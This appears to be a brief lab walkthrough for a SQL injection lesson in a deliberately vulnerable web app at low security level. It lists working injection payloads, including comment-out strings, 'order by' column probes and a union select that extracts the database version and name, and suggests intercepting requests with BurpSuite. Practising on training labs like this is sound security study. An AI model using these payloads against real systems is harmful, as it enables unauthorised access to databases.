SQL Injection AJAX JSON jQuery
SQL Injection (AJAX/JSON/jQuery) - Low Security Level
Solution:
Step 1. Give any alphabet as an input in the lesson text box and check the output
Note when you give an alphabet as an input results are displayed
Step 2. Give the below payloads as an input and check the results:
Payloads: '-- # (- All movies list are displayed
'order by 1-- #
'order by 2-- #
' union select 1,version(),3,4,database(),6,7 -- #
Note: Not covered in this video:
Explore the lesson with other payloads.
For more understanding of the lesson, it is recommended to look at the source code.
Use BurpSuite to intercept the request and test your inputs for correct results.
PseudoTime
